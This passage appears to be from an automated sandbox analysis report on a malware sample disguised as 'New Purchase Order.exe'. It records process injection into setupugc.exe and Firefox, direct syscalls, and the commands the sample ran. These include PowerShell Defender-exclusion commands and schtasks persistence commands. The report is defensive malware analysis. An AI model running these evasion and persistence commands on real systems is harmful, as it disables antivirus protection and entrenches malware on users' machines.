            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0112CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01150BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01150BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01150BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01130BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01130BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01130BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01138BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01138BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01138BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01154A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01154A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0115EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01140A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0116CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_011DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01168A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01204A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01138AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 8_2_01138AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory written: C:\Users\user\Desktop\New Purchase Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory written: C:\Users\user\AppData\Roaming\ibDqDkseW.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exeThread register set: target process: 7972
            Source: C:\Windows\SysWOW64\setupugc.exeThread APC queued: target process: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
